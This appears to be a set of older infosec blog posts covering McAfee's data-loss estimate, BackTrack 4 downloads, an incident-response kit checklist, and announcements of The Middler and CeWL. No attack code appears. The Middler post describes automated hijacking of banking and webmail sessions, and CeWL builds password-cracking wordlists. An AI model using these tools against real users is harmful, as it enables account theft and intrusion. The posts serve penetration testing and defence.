1 Trillion in Losses for 2008 - McAfee

McAfee:

California computer security firm McAfee presented the findings Thursday at the World Economic Forum in Davos, Switzerland, with a warning that the world's dismal financial straits are exacerbating data theft woes.

"Based on the survey findings McAfee conservatively estimates that the global damage from data loss to top one trillion dollars," said McAfee chief executive Dave DeWalt.

A few months ago I did an interview article about the current economic state and how it would affect InfoSec. Now I am poised to revisit that sentiment.

I would really like to be angry at CEO's and companies not giving enough to their IT staff to properly secure systems but I really cant. A few weeks ago I saw many friends lose their jobs, hard workers, and diligent people. The economy sucks right now, and it doesn't matter if you agree if we're in a recession or not, big business believes it.

With a decree from McAfee like this I hope C-Level executives start revisiting InfoSec priorities. They need to see where their policy-rubber doesn't hit the road so to speak. Want specifics? ok, here's some just off the top of my head.

- We need to revise policy. Even if stringent policy isn't your businesses style get someone to draft policy that fits your corporate culture ans still secures your entity.

- Adequate attention needs to be given to client side attacks.

- We need to prioritize the awareness of web application vulnerabilities.

- We need to stop preaching defense in depth, and start doing it.

- We need secure code review in our release cycles.

- We need more application whitelisting on our desktops.

- We need to review our wireless policies.

- We need more database security and input validation or filtering.

-We need user awareness training, compliance testing, auditing, and pentesting.

Lets hope the reality of losing more than our current stimulus package can wake a few people up.

BT4 Released!

You can get the iso here md5sum and sha512sum

And the VMWare image here md5sum and sha512sum

We are trying to get estimates of downloads. If you link to our ISOs, please use:

http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-vm

and do not link them directly.

Release information will shortly be available on the Remote Exploit Web site.

Incident Handling Resources

Over at Ethicalhacker.net i was asked to think up a good stepping stone and give some resources for a IH/IR program. Here's what i came up with:

I would create an internal document for each sys admin that contains spots for the systems they administer, description of those systems, a business risk analysis rating (are they critical?), IP/sysinfo, physical location, and a blank lined section for credentials and signatures.

Hand one out to each sysadmin, then have them fill it out and take take it your companies C-level executive who is the chief data owner. Have the admin write down the credentials, sign it, then have the CEO/CIO sign it and lock it away in a binder with a copy of your IR policy (once you draft it), up to date physical topology, toolkit/checklist, host inventory (including roaming laptops), etc. I would also use a data integrity program your systems periodically for comparison (a-la tripwire etc.)

Neophasis has some good ideas for a IH kit (from SANS 504) here:

http://archives.neohapsis.com/archives/fulldisclosure/2003-q3/1579.html

* Use a duffel bag and keep it permanently stocked.
* Never steal from your own bag.
* Hardware:
* Blank, unused (or at least wiped) SCSI disk.
* Blank, unused (or at least wiped) IDE disk.
* Small 8-port hub (NOT A SWITCH!). Get a really old one with AUI &
coax.
* Cat5, Cross-over Cat5, AUI, Coax cables.
* Laptop, dual OS. Use whatever OS's are best for your situation.
* Tx-neutered Cat5 (snip one wire, it's receive-only!)
* PCMCIA WiFi card
* USB Thumb drive.
* Serial cable w/ Cisco router connection.
* Flashlight
* Screwdrivers (but TSA might confiscate them -- you might have to buy
new ones each trip.)
* Female-to-Female RJ45.
* Tape recorder, mini-disk, or equiv.
* Camera (depending upon your requirements, digital, 35mm, or polaroid
in that order of legal admissibility).
* Video Camera, if your plan includes one. Consider the pitfalls of
too much info.
* Software:
* Copying software: dd, windd, ghost, etc.
* Sniffer software: ethereal, etc.
* Forensic software: Coroner's Toolkit, etc.
* Statically linked binaries: ls, ps, etc.
* Bootable OS on floppy or CD.
* Windows Resource Kit.
* Supplies:
* Lots of media for tape recorder.
* Lots of new, unused backup media (floppies, tapes, CD-R, etc.)
* Team phone list & company phone book
* Cell phone & LOTS of batteries (say, 3 or 4).
* Plastic baggies with ties for evidence.
* Extra notebooks (bound, with numbered pages)
* Extra copies of all of your forms.
* Pens (not pencils!)
* Business Cards

You should also consider budget for a a "War Room", a windowless office
(or closet) that you can meet in, tape evidence up on the wall, etc. It
has to have comm (net, phone, fax), TV/VCR, paper, whiteboards, etc.

You also need a slush fund. You need to be able spend money instantly
during an incident. If you need to cut a PO at 3:00AM to get an extra
SCSI drive, or some extra baggies, you are screwed. If you need to
consult the corp travel adviser before you fly to the location of an
incident, you are screwed.

The official SANS site has this good outline:

http://www.giac.org/resources/whitepaper/network/17.php

and this section detailing IR (whitepapers)

http://www.sans.org/reading_room/whitepapers/incident/

read the Handlers Diary's everyday!

http://isc.sans.org/diaryarchive.html

Additional Links:

Security Incident Survey Cheat Sheet for Server Administrators

http://www.zeltser.com/network-os-security/security-incident-survey-cheat-sheet.html

Initial Security Incident Questionnaire for Responders

http://www.zeltser.com/network-os-security/security-incident-questionnaire-cheat-sheet.html

Network DDoS Incident Response Cheat Sheet

http://www.zeltser.com/network-os-security/ddos-incident-cheat-sheet.html

Reverse-Engineering Cheat Sheet

http://www.zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html

My OPML file

This is my OPML file. Its a collection of everything infosec i have liked for the past year. Blogs, AV reports, security news, vuln reports, you name it you'll prob find it in here.

Big names and small names alike, tools, policy, industry, etc. Over 500 RSS links. I read about 25% of it daily, which means i'm always behind, but it still keeps me up to date =)

It includes the security bloggers network, mine, and some good friends conglomerated links.

Feel free to check through it, edit, trim, critique, but especially add and read.

Hope it helps someone!

http://wiki.securityaegis.com/Home/opml-file

Ethicalhacker.net

Hey everyone,

If you don't already go check out Ethicalhacker.net.

The reason i say this is because they have a really great community for admins, infosec, and IT all around. The forums, the exclusive articles, and webcasts they host are spectacular. I post a lot around there these days, and ill have a review of Nmap Secrets CBT there too soon.

Not only that but, the Inguardians team posts their monthly challenges there! Go decode some traffic, show off your Incident Handler skills, and win a prize!

-JH out

The Middler - RELEASED

Jay Beale (creator of bastille linux) will be releasing "the middler" after his talk at shmoocon.

Many of you remember he announced that he was releasing it at defcon 16 but the tool was barely at an alpha stage, he has now completed alpha.

Here ya go:

http://inguardians.com/tools/middler-alpha.tgz

Listen to the Defcon Audio on it here:

http://good.net/dl/bd/defcon-16-audio/08_dc_t412.mp3/info

And get the slides here:

http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-beale-2.pdf

<3 style="">

Jay Beale, Senior Security Consultant and Co-Founder, Intelguardians Network Intelligence, Inc. This talk introduces a new open source, plugin-extensible attack tool for exploiting web applications that use cleartext HTTP, if only to redirect the user to the HTTPS site. We'll demonstrate attacks on online banking as well as Gmail, LinkedIn, LiveJournal and Facebook. We'll also compromise computers and an iPhone by subverting their software installation and update process. We'll inject Javascript into browser sessions and demonstrate CSRF attacks.

Our new tool, The Middler, automates these attacks to make exploiting every active user on your computer's network brain-dead easy and scalable. It has an interactive mode, but also has a fire-and-forget mode that can perform these attacks automatically without interaction. Written in Ruby, this tool is easy to both extend and add into other tools.

PHPBB Hacked via third party script vuln

Saw this on Security Circus, very sad indeed:

http://hackedphpbb.blogspot.com/

CeWL for Penetration Testers

From the blog of Seth Misenar

CeWL for Pen Testers

Shortly after flipping through Ed’s slide deck for Secrets of America’s Top Pen Testers yesterday, I noticed a fortuitous tool annoucement come across the SANS GIAC Alumni mailing list. Robin Wood emailed to announce the release of a tool called CeWL: Custom Wordlist Generator (which is of course pronounced ‘cool’).

http://www.digininja.org/cewl.php

CeWL “spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper” (from the website).

Very nice. This tool dovetails nicely with Ed’s first tip from SATPT, “Build Password Guessing and Cracking Dictionaries”. In fact, it turns out that the tool was based on a PaulDotCom discussion, http://pauldotcom.com/2008/11/creating-custom-wordlists-for.html, which was in turn based upon content provided in Ed’s SEC560: Network Penetration Testing, which I will be teaching in Atlanta in February, https://www.sans.org/atlanta09_cs/description.php?tid=1717.

Wshew…did you follow all that. Regardless of its origins, CeWL definitely looks like something I will be adding to my tool arsenal. Check it out.